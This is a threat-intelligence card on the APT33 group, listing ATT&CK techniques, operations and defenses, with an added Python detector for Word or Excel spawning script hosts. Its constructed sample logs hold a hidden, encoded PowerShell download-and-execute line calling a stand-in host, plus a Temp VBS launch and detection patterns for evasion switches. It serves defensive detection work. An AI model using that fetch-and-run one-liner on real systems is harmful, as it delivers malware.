Threat Intelligence Tarot
Major Arcana · 11
Iran (IRGC-affiliated)
G0064
risk 4/5
The Flame Keeper
APT33
Elfin · Refined Kitten · Magnallium · HOLMIUM
Aviation · Energy · Petrochemical · Saudi Arabia · US defense
Active since ~2013 · Espionage, Sabotage, Destabilization
It was born of regional rivalry - a tool to burn what it cannot own. The Flame Keeper watches petrochemical plants and aviation systems with patient hostility, waiting for the instruction to ignite.
Tactics & Techniques
Reconnaissance · Resource Development · Initial Access · Execution · Persistence · Privilege Escalation · Defense Evasion · Credential Access · Discovery · Lateral Movement · Collection · Command and Control · Exfiltration · Impact
T1566.001  Spearphishing Attachment    · Initial Access
T1059.001  PowerShell                  · Execution
T1486      Data Encrypted for Impact   · Impact
T1204.002  Malicious File              · Execution
T1134      Access Token Manipulation   · Privilege Escalation
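The three techniques above that belong together in telemetry are the delivery chain: a spearphished attachment (T1566.001) is opened by the user (T1204.002) and its macro launches PowerShell (T1059.001). The detector below is an added example written for this profile, not code from the tarot page or from MITRE. It runs over constructed, Sysmon-style process-creation records (parent image, image, command line) and flags an Office host spawning a script interpreter, the usual evasion switches, and a `-EncodedCommand` payload, which it decodes so an analyst sees the actual script. Field names, the sample paths and the staging URL are assumptions chosen for the example.

```python
"""Added example: flag the Office -> PowerShell chain in process telemetry.

Input records are constructed here in a simplified Sysmon Event ID 1 style
(tab-separated Key=Value fields). Nothing below comes from the profile page.
"""
import base64
import ntpath
import re

# Office hosts that have no business spawning script interpreters.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Switches that hide the window, skip the profile or bypass execution policy.
EVASIVE_SWITCHES = re.compile(
    r"(?i)(?:^|\s)-(?:nop(?:rofile)?|noni(?:nteractive)?"
    r"|w(?:indowstyle)?\s+hidden|e(?:xecution)?p(?:olicy)?\s+bypass)\b"
)
# -e / -ec / -enc / -EncodedCommand followed by base64 (PowerShell uses UTF-16LE).
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def _make_encoded(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-2 download one-liner; example.invalid never resolves.
MALICIOUS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"

# Constructed sample records (not real telemetry).
SAMPLE_LOGS = [
    # Benign: Explorer opening a document in Word.
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "\tCommandLine=\"WINWORD.EXE\" /n \"C:\\Users\\a\\Downloads\\invoice.docx\"",
    # Macro dropper: Word spawns hidden PowerShell with an encoded command.
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell.exe -nop -w hidden -ep bypass -enc " + _make_encoded(MALICIOUS_SCRIPT),
    # Benign: an administrator running a script from cmd.
    "ParentImage=C:\\Windows\\System32\\cmd.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
    # Macro dropper without PowerShell: Excel spawns cmd to run a VBS file.
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\tImage=C:\\Windows\\System32\\cmd.exe"
    "\tCommandLine=cmd.exe /c wscript.exe C:\\Users\\a\\AppData\\Local\\Temp\\run.vbs",
]


def parse_record(line: str) -> dict:
    """Split 'Key=Value<TAB>Key=Value' into a dict (first '=' only)."""
    rec = {}
    for field in line.split("\t"):
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(line: str) -> dict:
    """Map one process-creation record to ATT&CK technique IDs with reasons."""
    rec = parse_record(line)
    parent = ntpath.basename(rec.get("ParentImage", "")).lower()
    image = ntpath.basename(rec.get("Image", "")).lower()
    cmd = rec.get("CommandLine", "")
    techniques, reasons, decoded = set(), [], None
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        techniques.add("T1204.002")
        reasons.append(f"{parent} spawned script host {image}")
    if image in {"powershell.exe", "pwsh.exe"}:
        if EVASIVE_SWITCHES.search(cmd):
            techniques.add("T1059.001")
            reasons.append("PowerShell launched with profile/window/policy evasion switches")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            techniques.add("T1059.001")
            reasons.append("decoded -EncodedCommand payload")
    return {"parent": parent, "image": image, "techniques": sorted(techniques),
            "reasons": reasons, "decoded": decoded}


def scan(lines) -> list:
    """Return only the records that triggered at least one technique."""
    return [r for r in (analyze(line) for line in lines) if r["techniques"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["image"], hit["techniques"], hit["reasons"], hit["decoded"])
```

On the constructed records only the two macro-spawned processes fire; the administrator's `-File` launch from cmd.exe stays quiet because neither the parent nor the switches are suspicious. In production the parent/child check is the high-signal rule; the switch regex alone would be noisy on management tooling, which is why it is only evaluated on the PowerShell image.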
Notable Operations
  • Shamoon 2 wiper campaign against Saudi targets (suspected link via shared tooling, not confirmed attribution; the original 2012 Shamoon attack hit Saudi Aramco)
  • Aviation sector credential harvesting
  • US defense contractor targeting
  • TURNEDUP and POWERTON backdoor deployment alongside commodity RATs such as NanoCore and NetWire (Leafminer / Raspite is a separate Iran-linked group, MITRE G0077, not APT33 malware)
Defenses
  • OT/ICS monitoring for petrochemical and energy environments
    IEC 62443
  • Application whitelisting on industrial workstations
    CIS Control 2
  • Macro and script execution controls on endpoints
    CIS Control 10
  • Threat intelligence feeds covering Iranian TTPs
    NIST CSF: ID.RA
Reversed: Their Weakness
APT33 leans on commodity tools and publicly available malware, which complicates attribution - a double-edged sword. When investigators cannot confirm the actor, political pressure on Iran is reduced; but the same off-the-shelf tooling is widely signatured, so the endpoint, macro and script controls listed above stop much of it before any custom payload ever runs.

Data sourced from MITRE ATT&CK. For educational purposes.